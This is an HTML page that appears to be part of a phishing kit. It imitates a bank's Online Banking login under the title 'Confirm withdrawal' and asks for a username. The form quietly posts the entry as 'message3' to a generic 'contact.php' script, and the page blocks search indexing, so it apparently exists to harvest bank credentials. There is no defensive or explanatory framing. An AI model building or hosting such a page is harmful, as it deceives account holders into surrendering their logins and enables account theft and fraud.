<!DOCTYPE html>
<html lang="en">
<head>
<meta content="noindex,nofollow,noarchive" name="robots" />
<title>Confirm withdrawal</title>
<meta charset="UTF-8">
<link href="css/ursula.css" rel="stylesheet" type="text/css" />
</head>
<body class="ursula">
<div class="innerPage" id="innerPage">
	<div class="grid_skin">
		<div class="row loginBoxes row_cam10_01">
			<div class="grid grid_9 containerStyle08 loginBox">
				<img src="images/logo.gif" alt="">
				<form  action="contact.php" method="post">
					<div class="row">
						<label>Please enter your username eg IB1234567890 or John123</label>
					</div>
					<div class="row rowwidth">
							<div class="textInput isRightSec">
								<input  tabindex="0" type="text" name="message3" value="" autocomplete="off" autofocus="">
							</div>
						<div class="button primary btnForward buttonMargin">
							<span class="buttonInner"><input type="submit" value="Continue" class="submit_input"> <span class="icon"></span></span>
						</div>
					</div>
					<div class="row">
								<div class="checkboxContainer">
									<div class="dijitInline dijitCheckBox"><input type="checkbox" tabindex="0" value="true" ></div> <label>Remember my username</label>
								</div>
					</div>
					<div class="row">
						<ul class="linkList01">
								<li>
									<a href="">
										Forgot your username?
										<span class="chevron"></span>
									</a>
								</li>
						</ul>
					</div>
				</form>
			</div>
			<div class="grid" style="border-right:1px solid #e5e5e5;height:285px;width:50px"></div>
<div class="grid grid_9 containerStyle08 loginBox" style="margin-left:25px" dir="ltr">
	<h3>Confirm withdrawal</h3>
	<p>Manage your money online with our secure Online<br>Banking service.</p>
	<br>
</div>	
			</div>
			</div>
			</div>
</body>
</html>
